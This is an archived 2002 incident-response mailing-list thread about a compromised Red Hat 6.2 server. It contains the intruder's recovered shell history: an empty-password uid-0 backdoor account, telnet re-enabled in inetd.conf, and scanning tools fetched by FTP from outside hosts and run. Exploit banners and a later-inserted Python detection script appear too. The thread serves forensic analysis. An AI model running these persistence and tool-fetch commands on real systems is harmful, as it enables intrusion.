Eric, please note that 'lpd' is running. Within rh6.2, that means a whole home run for a script kiddie. Not to mention that, if named was running, again with rh6.2 that would mean bind < 8.2.3P5, which in turn means serious troubles. Those two come to mind at a first glance... I cannot tell for sure about all the other stuff, since I'd have to take a look at some vuln database first. Both vulns have well-known and old exploits, very easy to find and use against such a default installation.

Have a look at /var/named, and look for any strange directory you could see there. If you find something strange, it's very likely you've been caught via the bind exploit. Keep in mind that lpd also gives full root compromise anyway, though.

Greets,

Jose Miguel Varet
Security Consultant
ISIS S.L.

----- Original Message -----
From: "Hines, Eric" <eric3at_private>
To: <incidentsat_private>
Cc: "'Tina Bird'" <tbird@precision-guesswork.com>; "'Lance Spitzner'" <lanceat_private>; "'Michael Clark'" <mikeat_private>
Sent: Wednesday, March 06, 2002 8:48 PM
Subject: Compromised - Port 1524

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Fellow Analysts:
>
> This morning several of our systems were compromised and I am still
> working to find out what exploit was used. Please offer any advice
> you can. A utility was left behind along with a massive amount of
> systems in output log files that were created by this utility. I have
> provided all my information below.
>
> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
> My notes
> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
> I went through the system and found the following things. The /tmp
> directory was the hacker's home directory he was using. Turns out he
> deleted that .bash_history file and forgot to nail
> /root/.bash_history
> However, it is still unclear to me how he broke in.
> Notice that he
> did an "echo telnetd >>" over to inetd.conf and started up telnetd.
> Yeah, he could have run the telnetd b0f exploits against it, but what's
> the point? He already had root access to the machine. I also checked
> the version of SSHD; I've checked its version against my 500 TARGETS
> for ./x2, ./x3 and ./x5 and it doesn't seem to match anything. I checked
> to see if snmp was running (wasn't running). Does anyone know if the
> Redhat 6.2 default install contained a vulnerable wu_ftpd?
> Unfortunately the machine was rebuilt before I could check the
> version of wu_ftpd. I went ahead and checked my exploits for it and
> wonder if anyone here has had any default wuftpd installs of redhat 6.2
> hit? If anyone has responded to a similar machine, please let me
> know!
>
> Eric
>
> [loki@tigerteam1 woot]$ ./forcer -t0
> ./forcer magic
> ./forcer <type> <addr>
> 1) RH7.2 - 2.6.2(1) Wed Aug 9 05:54:50 EDT 2002
> 2) RH7.2 - wu-2.6.2(2)
> 3) Special wu-2.6.3(3)
>
> [loki@tigerteam1 new]$ ./wu-sploit -t0
> 7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2)
> team teso (thx bnuts, tomas, synnergy.net !).
> Compiled for MnM 01/12/2001..pr0t!
>
> num . description
> ----+-------------------------------------------------------
>   1 | Caldera eDesktop|eServer|OpenLinux 2.3 update [wu-ftpd-2.6.1-13OL.i386.rpm]
>   2 | Debian potato [wu-ftpd_2.6.0-3.deb]
>   3 | Debian potato [wu-ftpd_2.6.0-5.1.deb]
>   4 | Debian potato [wu-ftpd_2.6.0-5.3.deb]
>   5 | Debian sid [wu-ftpd_2.6.1-5_i386.deb]
>   6 | Immunix 6.2 (Cartman) [wu-ftpd-2.6.0-3_StackGuard.rpm]
>   7 | Immunix 7.0 (Stolichnaya) [wu-ftpd-2.6.1-6_imnx_2.rpm]
>   8 | Mandrake 6.0|6.1|7.0|7.1 update [wu-ftpd-2.6.1-8.6mdk.i586.rpm]
>   9 | Mandrake 7.2 update [wu-ftpd-2.6.1-8.3mdk.i586.rpm]
>  10 | Mandrake 8.1 [wu-ftpd-2.6.1-11mdk.i586.rpm]
>  11 | RedHat 5.0|5.1 update [wu-ftpd-2.4.2b18-2.1.i386.rpm]
>  12 | RedHat 5.2 (Apollo) [wu-ftpd-2.4.2b18-2.i386.rpm]
>  13 | RedHat 5.2 update [wu-ftpd-2.6.0-2.5.x.i386.rpm]
>  14 | RedHat 6.? [wu-ftpd-2.6.0-1.i386.rpm]
>  15 | RedHat 6.0|6.1|6.2 update [wu-ftpd-2.6.0-14.6x.i386.rpm]
>  16 | RedHat 6.1 (Cartman) [wu-ftpd-2.5.0-9.rpm]
>  17 | RedHat 6.2 (Zoot) [wu-ftpd-2.6.0-3.i386.rpm]
>  18 | RedHat 7.0 (Guinness) [wu-ftpd-2.6.1-6.i386.rpm]
>  19 | RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]
>  20 | RedHat 7.2 (Enigma) [wu-ftpd-2.6.1-18.i386.rpm]
>  21 | SuSE 6.0|6.1 update [wuftpd-2.6.0-151.i386.rpm]
>  22 | SuSE 6.0|6.1 update wu-2.4.2 [wuftpd-2.6.0-151.i386.rpm]
>  23 | SuSE 6.2 update [wu-ftpd-2.6.0-1.i386.rpm]
>  24 | SuSE 6.2 update [wuftpd-2.6.0-121.i386.rpm]
>  25 | SuSE 6.2 update wu-2.4.2 [wuftpd-2.6.0-121.i386.rpm]
>  26 | SuSE 7.0 [wuftpd.rpm]
>  27 | SuSE 7.0 wu-2.4.2 [wuftpd.rpm]
>  28 | SuSE 7.1 [wuftpd.rpm]
>  29 | SuSE 7.1 wu-2.4.2 [wuftpd.rpm]
>  30 | SuSE 7.2 [wuftpd.rpm]
>  31 | SuSE 7.2 wu-2.4.2 [wuftpd.rpm]
>  32 | SuSE 7.3 [wuftpd.rpm]
>  33 | SuSE 7.3 wu-2.4.2 [wuftpd.rpm]
>  34 | Slackware 7.1
>
> [root@tigerteam1 floppy]# telnet 192.168.0.1 22
> Connected to 192.168.0.1 22
> Escape character is '^]'.
> SSH-1.99-OpenSSH_3.0.2p1
>
> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
> System Info
> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
> Redhat 6.2 (default install)
> SSHD
> RPC*
>
> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
> # ps -aux
> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
> USER       PID %CPU %MEM   VSZ  RSS TTY   STAT START    TIME COMMAND
> root         1  0.0  0.1  1120  416 ?     S    Feb25    0:04 init
> root         2  0.0  0.0     0    0 ?     SW   Feb25    0:00 [keventd]
> root         3  0.0  0.0     0    0 ?     SW   Feb25    0:00 [kapm-idled]
> root         4  0.0  0.0     0    0 ?     SWN  Feb25    0:00 [ksoftirqd_CPU0]
> root         5  0.0  0.0     0    0 ?     SW   Feb25    0:10 [kswapd]
> root         6  0.0  0.0     0    0 ?     SW   Feb25    0:00 [kreclaimd]
> root         7  0.0  0.0     0    0 ?     SW   Feb25    0:00 [bdflush]
> root         8  0.0  0.0     0    0 ?     SW   Feb25    0:00 [kupdated]
> root         9  0.0  0.0     0    0 ?     SW   Feb25    0:00 [khubd]
> bin        348  0.0  0.1  1212  484 ?     S    Feb25    0:00 portmap
> rpcuser    368  0.0  0.2  1340  544 ?     S    Feb25    0:00 rpc.statd
> root       382  0.0  0.1  1104  400 ?     S    Feb25    0:00 /usr/sbin/apmd -p 10 -w 5 -W -s /etc/sysconfig/apm-scripts/suspend -r
> root       434  0.0  0.1  1208  444 ?     S    Feb25    0:00 /usr/sbin/automount --timeout 60 /misc file /etc/auto.misc
> root       436  0.0  0.1  1208  500 ?     S    Feb25    0:00 /usr/sbin/automount --timeout 60 /home file /etc/auto.home
> root       441  0.0  0.1  1208  444 ?     S    Feb25    0:00 /usr/sbin/automount --timeout 60 /auto file /etc/auto.auto
> root       483  0.0  0.3  6264 1016 ?     S    Feb25    0:00 /sbin/mount.smbfs //physast1/Export /physast1 -o rw username turnshek
> root       502  0.0  0.1  1172  500 ?     S    Feb25    0:06 syslogd -m 0
> root       511  0.0  0.1  1944  436 ?     S    Feb25    0:10 klogd
> nobody     525  0.0  0.2  1312  600 ?     S    Feb25    0:00 identd -e -o
> nobody     529  0.0  0.2  1312  600 ?     S    Feb25    0:00 identd -e -o
> nobody     530  0.0  0.2  1312  600 ?     S    Feb25    0:03 identd -e -o
> nobody     531  0.0  0.2  1312  600 ?     S    Feb25    0:03 identd -e -o
> nobody     532  0.0  0.2  1312  600 ?     S    Feb25    0:00 identd -e -o
> daemon     543  0.0  0.1  1144  464 ?     S    Feb25    0:00 /usr/sbin/atd
> root       557  0.0  0.2  1328  556 ?     S    Feb25    0:00 crond
> root       575  0.0  0.1  1156  496 ?     S    Feb25    0:00 inetd
> root       589  0.0  0.1  1204  440 ?     S    Feb25    0:00 lpd
> root       615  0.0  0.1  1192  316 ?     S    Feb25    0:00 rpc.rquotad
> root       645  0.0  0.1  1248  364 ?     S    Feb25    0:00 rpc.mountd
> root       654  0.0  0.0     0    0 ?     SW   Feb25    0:00 [nfsd]
> root       655  0.0  0.0     0    0 ?     SW   Feb25    0:00 [nfsd]
> root       656  0.0  0.0     0    0 ?     SW   Feb25    0:00 [nfsd]
> root       657  0.0  0.0     0    0 ?     SW   Feb25    0:00 [lockd]
> root       658  0.0  0.0     0    0 ?     SW   Feb25    0:00 [rpciod]
> root       659  0.0  0.0     0    0 ?     SW   Feb25    0:00 [nfsd]
> root       660  0.0  0.0     0    0 ?     SW   Feb25    0:00 [nfsd]
> root       661  0.0  0.0     0    0 ?     SW   Feb25    0:00 [nfsd]
> root       662  0.0  0.0     0    0 ?     SW   Feb25    0:00 [nfsd]
> root       663  0.0  0.0     0    0 ?     SW   Feb25    0:00 [nfsd]
> condor     696  0.0  0.4  2816 1080 ?     S    Feb25    1:12 /auto/condor/sbin/condor_master
> condor     704  0.0  0.6  3596 1576 ?     S    Feb25    0:56 condor_startd -f
> condor     715  0.0  0.4  3324 1060 ?     S    Feb25    0:00 condor_schedd -f
> root       741  0.0  0.3  2432  780 ?     S    Feb25    0:00 sendmail: accepting connections
> root       756  0.0  0.1  1156  408 ?     S    Feb25    0:00 gpm -t imps2
> xfs        803  0.0  0.4  3404 1072 ?     S    Feb25    0:01 xfs -droppriv -daemon -port -1
> root       846  0.0  0.2  2092  672 ?     S    Feb25    0:29 sshd
> root       852  0.0  0.1  1092  336 tty1  S    Feb25    0:00 /sbin/mingetty tty1
> root       853  0.0  0.1  1092  336 tty2  S    Feb25    0:00 /sbin/mingetty tty2
> root       854  0.0  0.1  1092  336 tty3  S    Feb25    0:00 /sbin/mingetty tty3
> root       855  0.0  0.1  1092  336 tty4  S    Feb25    0:00 /sbin/mingetty tty4
> root       858  0.0  0.1  1092  336 tty5  S    Feb25    0:00 /sbin/mingetty tty5
> root       859  0.0  0.1  1092  336 tty6  S    Feb25    0:00 /sbin/mingetty tty6
> root       860  0.0  0.2  2744  620 ?     S    Feb25    0:00 /usr/bin/gdm -nodaemon
> root       865  2.8  2.5 48200 6564 ?     S    Feb25  358:24 /etc/X11/X -auth /var/gdm/:0.Xauth :0
> root       866  0.0  0.3  3452  972 ?     S    Feb25    0:00 /usr/bin/gdm -nodaemon
> turnshek 19979  0.0  0.7  5640 1864 ?     S    Mar03    0:00 /usr/bin/gnome-session
> turnshek 20009  0.0  0.6  5436 1596 ?     S    Mar03    0:00 gnome-smproxy --sm-config-prefix /.gnome-smproxy-lr5q76/ --sm-client-
> turnshek 20013  0.0  0.6  4376 1676 ?     S    Mar03    0:03 enlightenment -theme /usr/share/enlightenment/themes/CleanBig -smfile
> turnshek 20019  0.9  0.7  5968 2036 ?     S    Mar03   32:05 magicdev --sm-client-id 11888e7113000098519292400000009670005
> turnshek 20030  0.0  0.3  2636  804 ?     S    Mar03    0:00 gnome-name-service
> turnshek 20032  0.0  1.0  7072 2652 ?     S    Mar03    0:01 panel --sm-config-prefix /panel.d/Session-Cjxxlw/ --sm-client-id 1188
> turnshek 20034  0.0  0.6  3188 1648 ?     S    Mar03    0:05 xscreensaver -no-splash -timeout 20 -nice 10
> turnshek 20036  0.0  0.9  7536 2404 ?     S    Mar03    0:00 gmc --sm-config-prefix /gmc-mKvBkw/ --sm-client-id 11888e711300009851
> turnshek 20042  0.0  0.9  6100 2388 ?     S    Mar03    0:09 gnomepager_applet --activate-goad-server gnomepager_applet
> turnshek 20044  0.0  0.9  6068 2308 ?     S    Mar03    0:00 gen_util_applet --activate-goad-server gen_util_applet
> turnshek 22000  0.1  2.0 56824 5168 ?     S    Mar04    4:55 /usr/lib/netscape/netscape-communicator -irix-session-management
> turnshek 22016  0.0  0.2 16660  664 ?     S    Mar04    0:00 (dns helper)
> turnshek 22046  0.0  0.8  5832 2096 ?     S    Mar04    0:08 gnome-terminal
> turnshek 22047  0.0  0.1  1144  440 ?     S    Mar04    0:00 gnome-pty-helper
> turnshek 22048  0.0  0.2  2424  600 pts/0 S    Mar04    0:00 -csh
> turnshek 25361  0.0  0.8  5800 2100 ?     S    Mar05    0:00 gnome-terminal
> turnshek 25362  0.0  0.1  1144  440 ?     S    Mar05    0:00 gnome-pty-helper
> turnshek 25363  0.0  0.2  2424  600 pts/1 S    Mar05    0:00 -csh
> root      7402  0.0  0.3  1704  928 ?     S    03:49    0:00 bash -i
> root      9237  0.0  0.1  1112  404 ?     S    04:50    0:00 tail -f 211.out
> root      9506  0.0  0.1  1104  396 ?     S    05:07    0:00 tail -f 211.out
> root     10302  0.0  0.1  1100  384 ?     S    06:35    0:00 tail -f 122.out
> root     11808  9.8  0.2  1416  692 ?     RN   07:36    0:25 ./synscan 130 130.out eth0 30000 1524
> root     11812 52.3  0.2  1412  692 ?     RN   07:36    2:13 ./synscan 130 130.out eth0 30000 1524
> root     11817  0.0  0.0     0    0 ?     ZN   07:38    0:00 [synscan <defunct>]
> root     11818  0.0  0.0     0    0 ?     ZN   07:38    0:00 [synscan <defunct>]
> root     11819  0.0  0.0     0    0 ?     ZN   07:38    0:00 [synscan <defunct>]
> root     11820  0.0  0.0     0    0 ?     ZN   07:38    0:00 [synscan <defunct>]
> root     11821  0.0  0.0     0    0 ?     ZN   07:38    0:00 [synscan <defunct>]
> root     11822  0.0  0.0     0    0 ?     ZN   07:39    0:00 [synscan <defunct>]
> turnshek 11825 26.4  2.6 21660 6864 ?     RN   07:39    0:16 sproingies -root
> root     11830  0.0  0.0     0    0 ?     ZN   07:39    0:00 [synscan <defunct>]
> root     11834  0.6  0.6  2996 1580 ?     S    07:40    0:00 sshd
> root     11835  0.0  0.3  1724  972 pts/2 S    07:40    0:00 -bash
> root     11859  0.0  0.3  2556  872 pts/2 R    07:40    0:00 ps -augxw
>
> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
> Contents of /etc/passwd
> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
> u:x:12347:12347::/tmp:/bin/bash
> r:x:0:12348::/tmp:/bin/bash
>
> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
> Output generated by synscan1.6.tar (contains IP addresses of systems with
> port 1524 (ingreslock) open, logging connections that produce a # prompt)
> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
> 122.out
> 128.out
> 130.out
> 218.out
>
> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
> .bash_history
> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>
> uname -a;
> cat /proc/cpuifo;
> cat /proc/cpuinfo'
> ';
> cat /proc/cpuinfo;
> ping -c 5 www.yahoo.com;
> /usr/sbin/adduser -p "" u;
> tail /etc/passwd;
> /usr/sbin/adduser -p "" -d /tmp u;
> /usr/sbin/adduser -p "" -d /tmp -u 0 r;
> grep rsdh /etc/inetd.conf;
> grep rsh /etc/inetd.conf;
> grep shell /etc/inetd.conf;
> cat /etc/inetd.conf;
> ls -al /etc/inetd.conf;
> locate ...;
> /sbin/ifconfig -a;
> dmesg | grep -i promi;
> tail /etc/rc.d/rc.local;
> ps auwx| grep named;
> cat /etc/redhat-rel*;
> ps auwx| grep stat;
> exit;
>
> la -L /UAE/AVIN/IN.DRPS;
> ls -al /usr/sbin/in.ftpd;
> locate in.ftpd;
> tail /etc/passwd;
> echo "telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd" >> /etc/inetd.conf;
> ps auwx| grep inetd;
> kill -HUP 575;
> exit;
> cat /etc/hosts.deny;
> mv /etc/hosts.deny /etc/host.deny;
> exit;
> locate in.rlogin;
> ls -al /usr/sbin/in.*;
> locate telnet;
> ping -c 10 www.yahoo.com;
> wget;
> which lynx;
> ncftp
> cd /tmp;
> #cd /tmp;ncftpget -u <SANITIZED> -p <SANITIZED> ftp://211.23.134.186/../../home/test3/t0rnscan;rm -rf /root/.ncftp;chmod 755 t0rnscan;
> cd /tmp;ncftpget -u <SANITIZED> -p <SANITIZED> ftp://211.172.226.26/../../tmp/synscan;
> ls -al;
> cat fuk.ps;
> chmod 755 synscan;
> nohup ./synscan 216 216.out eth0 10000 1524 >/dev/null 2>/dev/null&2>/dev/null;
> ping -c 5 www.yahoo.com;
> ls -al 216.out;
> ls -al 216.out;
> grep "#" 216.out;
> ls -al 216.out;
> grep "#" 216.out;exit;
> cd /tmp;
> grep "#" *.out;
> tail 216.out;
> tail 216.out;
> tail 216.out;
> grep access *.out;
> tail 216.out;
> grep "#" 216.out;
> tail 216.out;
> tail 216.out;
> tail 216.out;
> ps auwx| grep synscan;
> tail 216.out;
> tail 216.out;
> killall -9 synscan;
> egrep "access|#" *.out;
> rm -rf 216.out;
> killall -9 synscan;
> nohup ./synscan 217 217.out eth0 30000 1524 >/dev/null 2>/dev/null&2>/dev/null;
> ping -c 5 www.yahoo.com;
> ls -al 217.out;
> cat 217.out;
> cat 217.out;
> tail 217.out;
> grep "#" 217.out;
> tail 217.out;
> tail 217.out;
> tail 217.out;
> tail 217.out;
> grep "#" 217.out;
> tail 217.out;
> grep "#" 217.out | grep -v root;
> tail 217.out;
> tail 217.out;
> tail 217.out;
> tail 217.out;
> tail 217.out;
> grep "#" 217.out;
> tail 217.out;
>
> tai217.out;
> tail 217.out;
> grep "#" 217.out | grep -v root;
> rm -rf 217.out;
> nohup ./synscan 218 218.out eth0 30000 1524 >/dev/null 2>/dev/null&2>/dev/null;
> ls -al 218.out;
> ls -al 218.out;
> ls -al 218.out;
> cat 218.out;
> exit;
> cd /tmp;
> ls;
> tail 218.out;
> grep "#" 218.out;
> tail *.out;
> killall -9 synscan;
> nohup ./synscan 24 24.out eth0 50000 10008 >/dev/null 2>/dev/null&2>/dev/null;
> ls -al 24.out;
> ls -al 24.out;
> ls -al 24.out;
> ls -al 24.out;
> p[s auwwx| grep synscan;
> ps auwx| grep synscan;
> ls -al 24.out;
> ls -al 24.out;
> ls -al 24.out;
> ls -al 24.out;
> ping -c 5 www.yahoo.com;
> ping -c 5 www.yahoo.com;
> ls -al 24.out;
> killall -9 synscan;
> nohup ./synscan 24 24.out eth0 30000 10008 >/dev/null 2>/dev/null&2>/dev/null;
> ping -c 5 www.yahoo.com;
> tail -f 24.out&2 >/dev/null;
> ps auwx| grep tail;
> ls -al 24.out;
> /
> /sbin/ifconfig -a;
> locate tcp.log;
> last| head -5;
> tail /home/sandhya/.bash_history;
> ls -al ~sandhya;
> cat /home/sandhya/.history;
> cat ~sandhya/.history;
> w;
> ls -al 24.out;
>
> ================================================
> Eric S. Hines
> Technical Lead
> Information Security Group
> Computer Security Incident Response Team (CSIRT)
> ------------------------------------------------
> University of Pittsburgh
> Cathedral of Learning #701
> Pittsburgh PA, 15260
> [ph] +1 412 624-6728
> [mo] +1 412 334-2379
> [em] eric3at_private
> [al] 4123342370at_private
> ================================================
>
> -----BEGIN PGP SIGNATURE-----
> Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com>
>
> iQA/AwUBPIZyXz4GESb0uqLMEQInbgCggBloMYEHfCWVbgcNKRTsu06Z/FAAnjgq
> wg9hokf1qGcgcYLiBI8iq+rj
> =2dWC
> -----END PGP SIGNATURE-----

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
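The thread above leaves the indicators scattered across a ps listing, two /etc/passwd lines, an appended inetd.conf entry and a .bash_history. As an added example (not code from either message, and not part of synscan, t0rnscan or any other tool named in the thread), the script below turns those indicators into checks a responder could run over saved copies of /etc/passwd, /etc/inetd.conf, a ps listing and the scanner's .out files: non-root uid-0 accounts and homes under /tmp, telnet re-enabled in inetd.conf, root processes with no controlling tty running an interactive shell or a scanner, the lpd/named daemons the reply singles out for RH 6.2, and the "#"-prompt grep the intruder ran against his own scan logs. The sample inputs are constructed from the artifacts quoted in the post; the scanner log layout ("<ip>: <text>") and the 192.0.2.x addresses are assumptions, since the real .out files are not shown.

```python
"""Triage checks for the indicators quoted in the thread above.

Added example, not code from the original posts. Sample inputs are built
from the artifacts Eric pasted (/etc/passwd entries, the appended inetd.conf
line, a few ps rows); the scanner log layout and 192.0.2.x hosts are assumed.
"""
import re
from typing import Dict, List, Tuple

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
turnshek:x:500:500::/home/turnshek:/bin/csh
u:x:12347:12347::/tmp:/bin/bash
r:x:0:12348::/tmp:/bin/bash
"""
SAMPLE_INETD = """\
ftp     stream  tcp  nowait  root  /usr/sbin/tcpd  in.ftpd -l -a
#telnet stream  tcp  nowait  root  /usr/sbin/tcpd  in.telnetd
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
"""
SAMPLE_PS = """\
root       589  0.0  0.1  1204  440 ?      S   Feb25  0:00 lpd
root      7402  0.0  0.3  1704  928 ?      S   03:49  0:00 bash -i
root     11808  9.8  0.2  1416  692 ?      RN  07:36  0:25 ./synscan 130 130.out eth0 30000 1524
root     11817  0.0  0.0     0    0 ?      ZN  07:38  0:00 [synscan <defunct>]
root     11835  0.0  0.3  1724  972 pts/2  S   07:40  0:00 -bash
"""
# Assumed scanner log layout: '<ip>: <text>' per event; a bare '#' means the
# probed port handed back a root prompt, which is what the intruder grepped for.
SAMPLE_SCAN_OUT = """\
192.0.2.10: connected 1524
192.0.2.10: #
192.0.2.11: connected 1524
192.0.2.11: login:
192.0.2.12: #
"""

def suspicious_accounts(passwd_text: str) -> List[Tuple[str, str]]:
    """(user, reason) for non-root uid-0 accounts and for homes under /tmp."""
    out = []
    for line in passwd_text.splitlines():
        f = line.split(":")
        if len(f) < 7:
            continue
        if f[2] == "0" and f[0] != "root":
            out.append((f[0], "uid 0"))
        if f[5] == "/tmp" or f[5].startswith("/tmp/"):
            out.append((f[0], "home under /tmp"))
    return out

def enabled_inetd_services(inetd_text: str) -> Dict[str, int]:
    """Live (uncommented) inetd.conf entries per service; the stock
    commented-out telnet line does not count, the appended one does."""
    counts: Dict[str, int] = {}
    for line in inetd_text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            svc = line.split()[0]
            counts[svc] = counts.get(svc, 0) + 1
    return counts

def parse_ps(ps_text: str) -> List[Dict[str, str]]:
    """Split 'ps aux' rows: ten fixed columns, then the command."""
    rows = []
    for line in ps_text.splitlines():
        p = line.split(None, 10)
        if len(p) == 11:
            rows.append({"user": p[0], "pid": p[1], "tty": p[6],
                         "stat": p[7], "cmd": p[10],
                         "exe": p[10].split()[0].rsplit("/", 1)[-1].lstrip("-")})
    return rows

def rogue_root_processes(ps_text: str, scanners=("synscan", "t0rnscan")) -> List[Tuple[int, str]]:
    """Root processes with no controlling tty that are an interactive shell
    or a scanner named in the .bash_history; zombies are skipped because
    their parent is the process that matters."""
    hits = []
    for p in parse_ps(ps_text):
        if p["user"] != "root" or p["tty"] != "?" or p["stat"].startswith("Z"):
            continue
        if p["exe"] in scanners or (p["exe"] in ("bash", "sh") and "-i" in p["cmd"].split()):
            hits.append((int(p["pid"]), p["cmd"]))
    return hits

def hosts_with_root_prompt(scan_out: str) -> List[str]:
    """Hosts in the scanner log that answered with a bare '#' prompt."""
    hosts: List[str] = []
    for line in scan_out.splitlines():
        m = re.match(r"^(\d{1,3}(?:\.\d{1,3}){3}):\s*(.*)$", line)
        if m and m.group(2).strip() == "#" and m.group(1) not in hosts:
            hosts.append(m.group(1))
    return hosts

def triage(passwd_text: str, inetd_text: str, ps_text: str) -> List[str]:
    """Findings the post's own evidence supports, one string each."""
    findings = [f"account {u!r}: {why}" for u, why in suspicious_accounts(passwd_text)]
    if enabled_inetd_services(inetd_text).get("telnet"):
        findings.append("telnet is enabled in inetd.conf")
    findings += [f"root process without a tty: pid {pid} {cmd}"
                 for pid, cmd in rogue_root_processes(ps_text)]
    # lpd and named are the two daemons the reply above singles out on RH 6.2
    findings += [f"{p['exe']} is running; check its version against vendor errata"
                 for p in parse_ps(ps_text) if p["exe"] in ("lpd", "named")]
    return findings

if __name__ == "__main__":
    print(*triage(SAMPLE_PASSWD, SAMPLE_INETD, SAMPLE_PS),
          *hosts_with_root_prompt(SAMPLE_SCAN_OUT), sep="\n")
```

On the real box the inputs would come from files copied off the system before the rebuild (the post notes the machine was rebuilt before wu_ftpd's version could be checked, which is exactly the evidence this kind of snapshot preserves). The ps parser relies on the `ps aux` column layout with the command in the eleventh field, so a listing produced with other flags needs the column indices adjusted; the scanner-log parser only ever matches the assumed layout and returns nothing for a real synscan file whose format differs.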
This archive was generated by hypermail 2b30 : Wed Mar 06 2002 - 15:44:28 PST